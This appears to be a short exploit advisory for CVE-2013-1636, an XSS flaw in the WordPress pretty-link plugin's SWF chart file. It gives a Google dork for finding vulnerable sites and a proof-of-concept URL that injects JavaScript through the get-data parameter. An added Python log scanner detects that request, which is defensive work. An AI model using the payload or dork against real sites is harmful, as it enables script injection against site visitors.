Exploit Title: WordPress pretty-link plugin XSS in SWF
Release Date: 20/02/13
Author: hip [Insight-Labs]
Tested on: XPsp3
Affected version: before 1.6.3
Google Dork: inurl:/wp-content/plugins/pretty-link/
REF: CVE-2013-1636
Introduction:
Pretty-link lets you shrink, beautify, track, manage and share any URL on or off of your WordPress website. Create links that look how you want using your own domain name!
XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf
vulnerable parameter: get-data
POC:
/wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=(function(){alert(xss)})()
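Detection check for the request above, as an added example that is not part of the original advisory: it scans web-server access log lines for requests to the SWF path and flags get-data values that are not a plain identifier. The log format, the identifier heuristic and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter taken from the advisory above.
SWF_SUFFIX = "/pretty-link/includes/version-2-kvasir/open-flash-chart.swf"
PARAM = "get-data"

# Assumption: a benign get-data value is a bare JavaScript identifier
# (optionally dotted); anything else is treated as suspicious.
SAFE_VALUE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(line):
    """Return None, 'swf-access' or 'suspicious-get-data' for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(SWF_SUFFIX):
        return None
    # parse_qs percent-decodes, so encoded and raw payloads are treated alike.
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    if any(not SAFE_VALUE.match(v) for v in values):
        return "suspicious-get-data"
    return "swf-access"


def scan(lines):
    """Yield (line_number, verdict) for every line that touches the SWF."""
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            yield n, verdict


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [20/Feb/2013:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.11 - - [20/Feb/2013:10:00:02 +0000] "GET /wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=chart_data HTTP/1.1" 200 9000',
    '192.0.2.12 - - [20/Feb/2013:10:00:03 +0000] "GET /wp-content/plugins/pretty-link/includes/version-2-kvasir/open-flash-chart.swf?get-data=%28function%28%29%7Balert%28xss%29%7D%29%28%29 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE):
        print(n, verdict)
```

Any 'swf-access' hit also shows that the SWF file is still present and reachable on the server.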
Patch: